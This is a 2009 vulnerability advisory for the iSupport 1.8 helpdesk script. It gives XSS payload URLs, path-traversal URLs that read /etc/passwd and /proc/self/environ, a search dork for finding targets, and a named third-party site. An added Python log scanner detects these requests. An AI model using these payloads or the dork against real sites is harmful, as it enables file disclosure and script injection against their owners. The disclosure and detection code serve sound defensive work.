iSupport <= 1.8 XSS/Local File Include Exploit

2009.12.30
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-79

---------------------------------------------
++ iSupport <= 1.8 ++
XSS/Local File Include Exploit
---------------------------------------------

Discovered by : Stink' & Essandre
DATE : 16/12/09

//////////////////////////////////////////////////////////////////////
Website : http://www.idevspot.com/
DEMO : http://www.idevspot.com/demo/iSupport/
DOWNLOAD : http://www.idevspot.com/iSupport.php => $
//////////////////////////////////////////////////////////////////////

[+] Vulnerability and Exploitation

Dork : "Powered by [ iSupport 1.8 ]"

--[XSS]--

http://[TARGET]/[PATH]/index.php?include_file=knowledgebase_list.php&x_category=PARENT_CATEGORY&which=[XSS]
http://[TARGET]/[PATH]/function.php?which=[XSS]

Example :

http://server/helpdesk/index.php?include_file=knowledgebase_list.php&x_category=PARENT_CATEGORY&which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E
http://server/helpdesk/function.php?which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E

--[XSS]-- in the member zone

http://jvdominator.com/helpdesk/index.php?include_file=ticket_submit.php

The flaw is in the form, in the "Subject", "Comments", etc. fields.
After clicking "Submit Ticket" you get your XSS alert :)

--[LFI]--

http://[TARGET]/[PATH]/index.php?include_file=[LFI]

Example :

http://server/helpdesk/index.php?include_file=../../../../../proc/self/environ
http://server/helpdesk/index.php?include_file=../../../../../etc/passwd

[+] Solution : N/A

The flaw has been fixed on some sites, but we do not know whether the publisher or the people running the script fixed it.
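For sites still running the script, the request shapes listed above can be picked out of web server access logs. The following is an added example, not part of the original advisory or of iSupport: it assumes combined-format log lines and that a legitimate include_file value is a bare page name; the log lines are constructed and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumption: a legitimate include_file value is a bare page name such as
# knowledgebase_list.php or ticket_submit.php, with no directory component.
SAFE_INCLUDE = re.compile(r"[A-Za-z0-9_]+\.php")
MARKUP = re.compile(r"[<>\"']")  # characters that need HTML encoding
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so %253C is still seen as '<'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(log_line):
    """Return the sorted findings for one access-log line."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    script = url.path.rsplit("/", 1)[-1]
    findings = set()
    for name, raw in parse_qsl(url.query, keep_blank_values=True):
        value = fully_decode(raw)
        if name == "include_file" and script == "index.php":
            if not SAFE_INCLUDE.fullmatch(value):
                findings.add("LFI:include_file")
        elif name == "which" and script in ("index.php", "function.php"):
            if MARKUP.search(value):
                findings.add("XSS:which")
    return sorted(findings)

# Constructed log lines; the request URLs follow the advisory's examples.
SAMPLE_LOG = [
    '192.0.2.7 - - [16/Dec/2009:10:00:01 +0000] "GET /helpdesk/index.php?include_file=knowledgebase_list.php&x_category=PARENT_CATEGORY&which=1 HTTP/1.1" 200 5120',
    '192.0.2.9 - - [16/Dec/2009:10:02:13 +0000] "GET /helpdesk/function.php?which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E HTTP/1.1" 200 812',
    '192.0.2.9 - - [16/Dec/2009:10:03:40 +0000] "GET /helpdesk/index.php?include_file=../../../../../etc/passwd HTTP/1.1" 200 1433',
]

def scan(lines):
    """Map each flagged line number (1-based) to its findings."""
    results = ((n, classify(line)) for n, line in enumerate(lines, start=1))
    return {n: found for n, found in results if found}
```

The ticket-form variant is submitted in a POST body, which access logs normally do not record, so this check does not cover it.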

References:

http://xforce.iss.net/xforce/xfdb/54859
http://xforce.iss.net/xforce/xfdb/54858
http://www.securityfocus.com/bid/37380
http://www.osvdb.org/61112
http://www.osvdb.org/61111
http://www.osvdb.org/61109
http://www.exploit-db.com/exploits/10478
http://secunia.com/advisories/37726
http://packetstormsecurity.org/0912-exploits/isupport-lfixss.txt

